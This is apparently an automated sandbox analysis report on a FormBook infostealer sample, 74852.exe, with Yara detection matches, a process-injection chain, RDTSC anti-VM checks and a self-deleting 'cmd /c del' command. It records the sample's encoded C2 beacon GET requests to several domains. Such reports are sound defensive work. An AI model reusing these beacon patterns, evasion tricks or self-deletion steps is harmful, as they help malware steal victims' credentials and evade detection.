Source: Joe Sandbox View	IP Address: 199.59.242.153 199.59.242.153
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: TEBYANIR TEBYANIR
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1Host: www.pciappky.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.borokish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.wingateofhouston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.pciappky.com

Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.260457732.0000000006840000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: 74852.exe, 00000000.00000002.244473079.000000000147A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041A060 NtClose,	1_2_0041A060
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041A110 NtAllocateVirtualMemory,	1_2_0041A110
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00419F30 NtCreateFile,	1_2_00419F30
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00419FE0 NtReadFile,	1_2_00419FE0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041A05A NtClose,	1_2_0041A05A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041A10B NtAllocateVirtualMemory,	1_2_0041A10B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00419FDA NtReadFile,	1_2_00419FDA
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459540 NtReadFile,LdrInitializeThunk,	1_2_01459540
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01459910
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014595D0 NtClose,LdrInitializeThunk,	1_2_014595D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014599A0 NtCreateSection,LdrInitializeThunk,	1_2_014599A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459840 NtDelayExecution,LdrInitializeThunk,	1_2_01459840
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01459860
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014598F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_014598F0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01459710
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01459780
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014597A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_014597A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459A50 NtCreateFile,LdrInitializeThunk,	1_2_01459A50
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01459660
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01459A00
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459A20 NtResumeThread,LdrInitializeThunk,	1_2_01459A20
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014596E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_014596E0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459950 NtQueueApcThread,	1_2_01459950
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459560 NtWriteFile,	1_2_01459560
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459520 NtWaitForSingleObject,	1_2_01459520
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0145AD30 NtSetContextThread,	1_2_0145AD30
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014599D0 NtCreateProcessEx,	1_2_014599D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014595F0 NtQueryInformationFile,	1_2_014595F0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0145B040 NtSuspendThread,	1_2_0145B040
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459820 NtEnumerateKey,	1_2_01459820
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014598A0 NtWriteVirtualMemory,	1_2_014598A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459760 NtOpenProcess,	1_2_01459760
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459770 NtSetInformationFile,	1_2_01459770
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0145A770 NtOpenThread,	1_2_0145A770
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459B00 NtSetValueKey,	1_2_01459B00
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0145A710 NtOpenProcessToken,	1_2_0145A710
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459730 NtQueryVirtualMemory,	1_2_01459730
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459FE0 NtCreateMutant,	1_2_01459FE0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0145A3B0 NtGetContextThread,	1_2_0145A3B0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459650 NtQueryValueKey,	1_2_01459650
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459670 NtQueryInformationProcess,	1_2_01459670
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459610 NtEnumerateValueKey,	1_2_01459610
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459A10 NtQuerySection,	1_2_01459A10
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014596D0 NtCreateKey,	1_2_014596D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01459A80 NtOpenDirectoryObject,	1_2_01459A80

Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041E147	1_2_0041E147
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041D27D	1_2_0041D27D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041E3B6	1_2_0041E3B6
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00402D87	1_2_00402D87
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00409E3C	1_2_00409E3C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041E74D	1_2_0041E74D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E1D55	1_2_014E1D55
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141F900	1_2_0141F900
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E2D07	1_2_014E2D07
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01410D20	1_2_01410D20
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01434120	1_2_01434120
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E25DD	1_2_014E25DD
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142D5E0	1_2_0142D5E0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442581	1_2_01442581
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DD466	1_2_014DD466
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1002	1_2_014D1002
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142841F	1_2_0142841F
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E28EC	1_2_014E28EC
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142B090	1_2_0142B090
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E20A8	1_2_014E20A8
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E2B28	1_2_014E2B28
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DDBD2	1_2_014DDBD2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E1FF1	1_2_014E1FF1
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144EBB0	1_2_0144EBB0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01436E30	1_2_01436E30
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E2EF7	1_2_014E2EF7
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E22AE	1_2_014E22AE

Source: C:\Users\user\Desktop\74852.exe	Code function: String function: 0141B150 appears 35 times
Source: C:\Users\user\Desktop\74852.exe	Code function: String function: 00237C6A appears 60 times

Source: 74852.exe, 00000000.00000003.241665351.000000001C90F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
Source: 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe

Source: 74852.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@10/3

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_01

Source: 74852.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\74852.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 74852.exe

ReversingLabs: Detection: 43%

Source: C:\Users\user\Desktop\74852.exe

File read: C:\Users\user\Desktop\74852.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
Source: unknown	Process created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\74852.exe	Process created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: 74852.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 74852.exe

Source: 74852.exe

Static PE information: real checksum: 0x192ce should be: 0x3b2c0

Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_00237C90 push eax; ret	0_2_00237CBE
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00237C90 push eax; ret	1_2_00237CBE
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041D0D2 push eax; ret	1_2_0041D0D8
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041D0DB push eax; ret	1_2_0041D142
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041D085 push eax; ret	1_2_0041D0D8
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00408138 push edi; retf	1_2_0040813F
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041D13C push eax; ret	1_2_0041D142
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041D22A push BBECAF91h; ret	1_2_0041D277
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00416A3E push cs; retf	1_2_00416A52
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00416AD6 push eax; iretd	1_2_00416AD7
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00416AB0 pushad ; retf	1_2_00416AB4
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00417B60 push cs; iretd	1_2_00417B62
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00403658 push FFFFFFA6h; iretd	1_2_0040365A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00416674 push edx; retf	1_2_00416689
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041E6A3 push esi; retf	1_2_0041E6A5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0041DF21 push es; ret	1_2_0041DF22
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_004167A7 push edi; ret	1_2_004167A8
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0146D0D1 push ecx; ret	1_2_0146D0E4

Source: C:\Windows\SysWOW64\chkdsk.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\74852.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\74852.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 00000000010098E4 second address: 00000000010098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000001009B5E second address: 0000000001009B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\74852.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Windows\explorer.exe TID: 6880	Thread sleep count: 55 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6880	Thread sleep time: -110000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
